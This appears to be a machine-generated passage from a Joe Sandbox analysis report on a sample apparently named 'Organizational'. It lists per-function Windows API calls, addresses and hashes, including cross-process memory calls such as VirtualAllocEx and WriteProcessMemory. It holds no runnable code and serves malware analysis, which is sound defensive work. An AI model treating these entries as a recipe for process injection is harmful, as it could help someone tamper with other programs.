                                                          • Opcode Fuzzy Hash: dd555e8c9e36884f632a68b974c00483ee7b87cedca7a0aa8e9e12cb479bd1af
                                                          • Instruction Fuzzy Hash: 2701D6726701093FD211A5159C46FAB635CAF23384F348025FE0AA7241EBA8DE3086E0
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 002B5075
                                                          • __beginthreadex.LIBCMT ref: 002B5093
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 002B50A8
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B50BE
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B50C5
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: dff64fe794f77e72768c99976e1999dc707432e19015557a9761c8838be4f225
                                                          • Instruction ID: 19136b6d11da7d97ac48b356b62595304f3c5790029ac27fa6f546cdc5990dd2
                                                          • Opcode Fuzzy Hash: dff64fe794f77e72768c99976e1999dc707432e19015557a9761c8838be4f225
                                                          • Instruction Fuzzy Hash: 5C114C729146587FC7019FA8AC48BDB7BACAB49320F144655F814DB350D2B1895187F0
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
                                                          • GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
                                                          • HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
                                                          Similarity
                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 842720411-0
                                                          • Opcode ID: 0442d75f4b92f192b53f2f023e01941c9e8634ecfebe4a1db27eabde29711448
                                                          • Instruction ID: f1f1eef0e235d92f2fa07398cf97198d7ed2a90521c6c326335401bbb6cd2838
                                                          • Opcode Fuzzy Hash: 0442d75f4b92f192b53f2f023e01941c9e8634ecfebe4a1db27eabde29711448
                                                          • Instruction Fuzzy Hash: 02014B70650245EFDB204FA5EDCCD6B7BADEF8A354B140569F849CA220DA719C51CA60
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B581B
                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5829
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5831
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B583B
                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5877
                                                          Similarity
                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                          • String ID:
                                                          • API String ID: 2833360925-0
                                                          • Opcode ID: 040c1319c41c754775b3605f53eac3a367bbb7efbd0bef09ea5be7bea3d35547
                                                          • Instruction ID: 0b573568ff75e247687e25e2e4e15468ca0c5506076dcc7a0553a9f230026755
                                                          • Opcode Fuzzy Hash: 040c1319c41c754775b3605f53eac3a367bbb7efbd0bef09ea5be7bea3d35547
                                                          • Instruction Fuzzy Hash: 4A016931C11A2DDBDF00AFE8E88CAEDBBB8FB0C751F004156E905BA140CB7095A1CBA1
                                                          APIs
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?,?,002A8073), ref: 002A7D45
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D60
                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D6E
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?), ref: 002A7D7E
                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7C62,80070057,?,?), ref: 002A7D8A
                                                          Similarity
                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                          • String ID:
                                                          • API String ID: 3897988419-0
                                                          • Opcode ID: 110be607b3d9ac522b576ade084460e704934c37b81a2f510f9a7c62e4c68dd7
                                                          • Instruction ID: a760c4b3e7352e75df56cec8aeeea3b63184e1c7a0c23a557f5bbd5ef4fcfad9
                                                          • Opcode Fuzzy Hash: 110be607b3d9ac522b576ade084460e704934c37b81a2f510f9a7c62e4c68dd7
                                                          • Instruction Fuzzy Hash: 0101DF72621615BBDB108F54EC88BAA7BADEF85752F104024FC08DA210DBB5ED50CBE4
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A8CDE
                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A8CE8
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A8CF7
                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A8CFE
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A8D14
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: bf5dc806e9f8f75f8c5b6df178dcb4f6c2d1893e579d5a04bb0243320e65c8e5
                                                          • Instruction ID: c901a5f5e796575e0178737fe5d77f029755166e47cdcb03e9547e5043d98961
                                                          • Opcode Fuzzy Hash: bf5dc806e9f8f75f8c5b6df178dcb4f6c2d1893e579d5a04bb0243320e65c8e5
                                                          • Instruction Fuzzy Hash: 2EF0AF30250205AFEB100FF4ECCCE673BACEF8A754B104029F944CA190DEA0AC92DB60
                                                          APIs
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8D3F
                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D49
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D58
                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D5F
                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D75
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                          • String ID:
                                                          • API String ID: 44706859-0
                                                          • Opcode ID: 87af34f6aab43251b31d59c269c890f68bfe678d76cd868d670759dd01822233
                                                          • Instruction ID: b71420154757afef23e2abe03036bc349fe8802b9b799445c313f28f5c64e39e
                                                          • Opcode Fuzzy Hash: 87af34f6aab43251b31d59c269c890f68bfe678d76cd868d670759dd01822233
                                                          • Instruction Fuzzy Hash: D5F08C30290245AFEB110FA4ECCCF673BACEF9AB54F040129F9448A190CEA09D92DA60
                                                          APIs
                                                          • GetDlgItem.USER32(?,000003E9), ref: 002ACD90
                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 002ACDA7
                                                          • MessageBeep.USER32(00000000), ref: 002ACDBF
                                                          • KillTimer.USER32(?,0000040A), ref: 002ACDDB
                                                          • EndDialog.USER32(?,00000001), ref: 002ACDF5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                          • String ID:
                                                          • API String ID: 3741023627-0
                                                          • Opcode ID: 6e2e6201a735bd6cbb8f878492824c51463301873f204ab757c81c92927f6cbd
                                                          • Instruction ID: 2e25f3023867a421c0e36a1c5e5566803706244929a939f1b6cee08169b2bfc4
                                                          • Opcode Fuzzy Hash: 6e2e6201a735bd6cbb8f878492824c51463301873f204ab757c81c92927f6cbd
                                                          • Instruction Fuzzy Hash: 6901A230550B04ABEB205F60ECCEFA67B7CFB01701F000669A582A50E1DBE0A9A58A90
                                                          APIs
                                                          • EndPath.GDI32(?), ref: 0025179B
                                                          • StrokeAndFillPath.GDI32(?,?,0028BBC9,00000000,?), ref: 002517B7
                                                          • SelectObject.GDI32(?,00000000), ref: 002517CA
                                                          • DeleteObject.GDI32 ref: 002517DD
                                                          • StrokePath.GDI32(?), ref: 002517F8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                          • String ID:
                                                          • API String ID: 2625713937-0
                                                          • Opcode ID: 64791a82b382796d9294d862385adc5412c8e9286dae9798e4aad91738ef7883
                                                          • Instruction ID: f9ffa5be2b9b4509a8573cd0dfb56037e66ed66a6ce90008edbe675f9a5c59c2
                                                          • Opcode Fuzzy Hash: 64791a82b382796d9294d862385adc5412c8e9286dae9798e4aad91738ef7883
                                                          • Instruction Fuzzy Hash: CCF01930058249ABDB225F29EC8D7987BB9A708322F08C214F829481F0D77549AADF14
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 002BCA75
                                                          • CoCreateInstance.OLE32(002E3D3C,00000000,00000001,002E3BAC,?), ref: 002BCA8D
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • CoUninitialize.OLE32 ref: 002BCCFA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                          • String ID: .lnk
                                                          • API String ID: 2683427295-24824748
                                                          • Opcode ID: 8a07547cd49e7bc56de865c0503bf64b50c765d37a3256cc0a3a544854f2a97c
                                                          • Instruction ID: f78ef3dfcf6e8acdebff126202c3e1b40a576c5c15d5ab8026b30465ecdc71e3
                                                          • Opcode Fuzzy Hash: 8a07547cd49e7bc56de865c0503bf64b50c765d37a3256cc0a3a544854f2a97c
                                                          • Instruction Fuzzy Hash: 13A16A71114205AFD300EF64C881EAFB7E8EF98349F00495DF555972A2EB70EA99CF92
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                            • Part of subcall function 00261680: _memmove.LIBCMT ref: 002616DB
                                                          • __swprintf.LIBCMT ref: 0025E598
                                                          Strings
                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0025E431
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                          • API String ID: 1943609520-557222456
                                                          • Opcode ID: a23f5e1c26b24ae4ab6eb7944845762945388370e45f98b925a6486654155a57
                                                          • Instruction ID: 4b06edbfeb774c7202df022259081ecb93f1605e9d8cc327d5801b28f0808213
                                                          • Opcode Fuzzy Hash: a23f5e1c26b24ae4ab6eb7944845762945388370e45f98b925a6486654155a57
                                                          • Instruction Fuzzy Hash: 1E91C1715342119FCB18EF24C895C6EB7A8EF95304F44491DF886972A1EB30EE68CF96
                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 002752CD
                                                            • Part of subcall function 00280320: __87except.LIBCMT ref: 0028035B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorHandling__87except__start
                                                          • String ID: pow
                                                          • API String ID: 2905807303-2276729525
                                                          • Opcode ID: dcb7381c8e88e654309ade6ec763192a1d764253ba664793a3f773f6c578c878
                                                          • Instruction ID: 7a654faec07186c61c4c1dd84127b86c8d63decd9d21dcab200155beb95a6a4f
                                                          • Opcode Fuzzy Hash: dcb7381c8e88e654309ade6ec763192a1d764253ba664793a3f773f6c578c878
                                                          • Instruction Fuzzy Hash: 94518D25E3AA0387CB517F14C98136AA7949B41750F30CC99E4DD861E6EFF48CF89B42
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$+
                                                          • API String ID: 0-2552117581
                                                          • Opcode ID: 6f3f6a0b6232016075af3a89584e4aa97179fcfb2b5ead4124cc2bb74a72e7e2
                                                          • Instruction ID: ee32896fd4a983ec540351076d8c85a38b05a73467aeccdd0c102e9f8a0aff1c
                                                          • Opcode Fuzzy Hash: 6f3f6a0b6232016075af3a89584e4aa97179fcfb2b5ead4124cc2bb74a72e7e2
                                                          • Instruction Fuzzy Hash: 99514975520256CFDF15DF68C488AFABBA8EF56310F184055FC959B290CB34ACBACB60
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: #V&
                                                          • API String ID: 2620147621-4221984388
                                                          • Opcode ID: 4713c1530f2fdccbab2b3f94dfd25348eec59a4455dc15e2891f4484dd9cc6ae
                                                          • Instruction ID: f04482cebac655550a73fdf1ce0df667859403de70bc40421a8168050313d90a
                                                          • Opcode Fuzzy Hash: 4713c1530f2fdccbab2b3f94dfd25348eec59a4455dc15e2891f4484dd9cc6ae
                                                          • Instruction Fuzzy Hash: 6D517B716283028FDB28CF28C480B2FB7E5FF85315F15492DE88987251E731E925CB86
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 894b722fb8d177f01218b6881c9adc0b96ebfc3ca710f2ebf9e8d00edf8a3319
                                                          • Instruction ID: 954a168fd50ed97b834dcd03c93a111aff19583a6adf44de572637054cd25ec9
                                                          • Opcode Fuzzy Hash: 894b722fb8d177f01218b6881c9adc0b96ebfc3ca710f2ebf9e8d00edf8a3319
                                                          • Instruction Fuzzy Hash: A051C671A2030A9BDB24DF64C8817AABBF8EF04310F24856EE54ADB281E77095E5CB40
                                                          APIs
                                                            • Part of subcall function 002B1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9E4E,?,?,00000034,00000800,?,00000034), ref: 002B1CE5
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002AA3F7
                                                            • Part of subcall function 002B1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002B1CB0
                                                            • Part of subcall function 002B1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002B1C08
                                                            • Part of subcall function 002B1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A9E12,00000034,?,?,00001004,00000000,00000000), ref: 002B1C18
                                                            • Part of subcall function 002B1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A9E12,00000034,?,?,00001004,00000000,00000000), ref: 002B1C2E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002AA464
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002AA4B1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: ac7d715bdb290ee4c80f2d9b7ed7792c858ede0305b430d67d5e37eb7da4aec0
                                                          • Instruction ID: 20f7875304edf0078c4fb0509d2f86227b197b8e57b91449b52f2e46e7b5f3c6
                                                          • Opcode Fuzzy Hash: ac7d715bdb290ee4c80f2d9b7ed7792c858ede0305b430d67d5e37eb7da4aec0
                                                          • Instruction Fuzzy Hash: 0D413B7294021CAFDB10DFA4CD85AEEBBB8EF49340F004095FA55B7180DA706EA5CFA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D7A86
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D7A9A
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7ABE
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                           • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 0cb436011c3656a31fe8a7a23ec317abf7666dd9fd08f92678a0e445897c5993
                                                          • Instruction ID: b7f37de8c5b1fdc32a9d916eede92c867af6d4200844b6cc9e264d8aaa02be3a
                                                          • Opcode Fuzzy Hash: 0cb436011c3656a31fe8a7a23ec317abf7666dd9fd08f92678a0e445897c5993
                                                          • Instruction Fuzzy Hash: 1B21D332660219BFDF118F50CC86FEE3B69EF48714F110215FE146B2D0EAB5AC658BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002D826F
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002D827D
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002D8284
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 7be2fed606628cf60a799537607b7f7fa11c452759a3a690ba7e0eb48347f3d1
                                                          • Instruction ID: b37b6d440651259d4ba0b254bbbb99a3778cf70b20a4b53e5eb2dfa3c7ca8f87
                                                          • Opcode Fuzzy Hash: 7be2fed606628cf60a799537607b7f7fa11c452759a3a690ba7e0eb48347f3d1
                                                          • Instruction Fuzzy Hash: 78219FB5610249AFDB01DF58CCC5DA737BDEB4A754B08405AFA049B3A1CB70EC21CBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D7360
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D7370
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D7395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 84dbf586adbe0ab2bb48a0e62eb002191065fbf855c14265af5e4908ad5dafe1
                                                          • Instruction ID: 573effd0ef123ac7824e56e8ea83ddaed357ac8644bb701349d039f71420208b
                                                          • Opcode Fuzzy Hash: 84dbf586adbe0ab2bb48a0e62eb002191065fbf855c14265af5e4908ad5dafe1
                                                          • Instruction Fuzzy Hash: E121FF32624119BFDF128F54CC85FBF37AAEB89760F118125FD009B2A0D675AC619BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D7D97
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D7DAC
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7DB9
                                                          Strings
